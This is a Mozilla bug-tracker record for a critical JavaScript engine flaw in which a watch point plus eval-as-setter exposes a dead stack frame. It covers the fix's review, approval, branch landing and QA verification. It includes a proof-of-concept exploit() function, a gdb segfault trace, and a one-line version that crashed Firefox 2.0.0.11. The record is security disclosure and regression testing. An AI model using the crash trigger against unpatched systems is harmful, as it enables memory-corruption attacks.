Closed Bug 390597 Opened 17 years ago Closed 17 years ago

watch point + eval-as-setter allows access to dead JSStackFrame

Categories: Core :: JavaScript Engine, defect
Priority: Not set
Severity: critical
Status: VERIFIED FIXED
People: Reporter: sync2d, Assigned: mrbkap
Details: 4 keywords, Whiteboard: [sg:critical?]
Attachments: 3 files
$ cat watch-point-dead-stack.txt
function exploit() {
  var obj = this, args = null;
  obj.__defineSetter__("evil", eval);
  obj.watch("evil", function() { return "args = arguments;"; });
  obj.evil = null;
  eval("print(args[0]);");
}
exploit();

$ gdb --eval run --args dbg.obj/js watch-point-dead-stack.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x0043729b in JS_GetReservedSlot (cx=<incomplete type>, obj=0x1, index=0,
    vp=0xa4e2cc) at jsapi.c:3971
3971        clasp = OBJ_GET_CLASS(cx, obj);
Attached patch: FIx
Wow, I didn't know it was possible to create an arguments object for the pseudo-frame. It's getting to be more and more like a real frame every day!
Assignee: general → mrbkap
Status: NEW → ASSIGNED
Attachment #275031 - Flags: review?(brendan)
Comment on attachment 275031 [details] [diff] [review]
FIx

Indeed. Need to be careful there isn't more like this (I don't know of any, just sayin').

/be
Attachment #275031 - Flags: review?(brendan)
Attachment #275031 - Flags: review+
Attachment #275031 - Flags: approval1.9?
Comment on attachment 275031 [details] [diff] [review]
FIx

Sorry, a=me.

/be
Attachment #275031 - Flags: approval1.9? → approval1.9+
Fix checked into trunk, finally.
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
I am sure this is a stoopid question, but why does the browser throw "EvalError: function eval must be called directly, and not by way of a function of another name" but the shell doesn't?
Flags: in-testsuite+
Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
(In reply to comment #6)
> Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
> 

That removed the EvalError. Bug?
Yeah, it's a bug.
Depends on: 397071
No longer depends on: 397071
verified fixed 1.9.0 linux/mac*/win

this crashes in the browser 1.8.1. do we want it on the branch?
Status: RESOLVED → VERIFIED
Flags: blocking1.8.1.9?
Flags: blocking1.8.1.10?
blake, brendan: does this patch work for the 1.8 branch or do we need a different fix (or none)? Can we land this in a day or two, or should we wait for 1.8.1.11?
Whiteboard: [sg:critical?]
Flags: blocking1.8.1.10?
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.12?
Flags: blocking1.8.1.12+
If this patch applies to the 1.8 branch can you please request approval? Otherwise, please attach a branch patch.

(QA: To test, use the JS 'shell' bookmarklet.)
Keywords: testcase
Whiteboard: [sg:critical?] → [sg:critical?] [need 1.8 branch patch]
Attached patch: 1.8 branch patch
I had to hand merge because the watchpoint thread-safety fixes never went in on the 1.8 branch. The patch was trivial to merge.
Attachment #294507 - Flags: review+
Attachment #294507 - Flags: approval1.8.1.12?
Whiteboard: [sg:critical?] [need 1.8 branch patch] → [sg:critical?]
Comment on attachment 294507 [details] [diff] [review]
1.8 branch patch

approved for 1.8.1.12, a=dveditz for release-drivers
Attachment #294507 - Flags: approval1.8.1.12? → approval1.8.1.12+
Fixed on the 1.8 branch.
Keywords: fixed1.8.1.12
I crashed 2.0.0.11 by pasting (with much-cleaner linebreaks!):

function exploit() { try { var obj = this, args = null; obj.__defineSetter__("evil", eval); obj.watch("evil", function() { return "args = arguments;"; }); obj.evil = null; eval("print(args[0]);"); } catch(ex) { print('Caught ' + ex); } } exploit();

into Jesse's handy JS "shell" bookmarklet, on Windows XP.

With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080128 Firefox/2.0.0.12, I get |undefined|, and no crash.

Replacing fixed1.8.1.12 with verified1.8.1.12; special thanks to bc for the support/sanity-checking.
Group: security
Flags: blocking1.8.0.15+
Comment on attachment 294507 [details] [diff] [review]
1.8 branch patch

a=asac for 1.8.0.15

(unmodified distro patch)
Attachment #294507 - Flags: approval1.8.0.15+
MOZILLA_1_8_0_BRANCH:

Checking in js/src/jsdbgapi.c;
/cvsroot/mozilla/js/src/jsdbgapi.c,v  <--  jsdbgapi.c
new revision: 3.56.2.1.4.13; previous revision: 3.56.2.1.4.12
done
Keywords: fixed1.8.0.15
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-390597.js,v  <--  regress-390597.js
initial revision: 1.1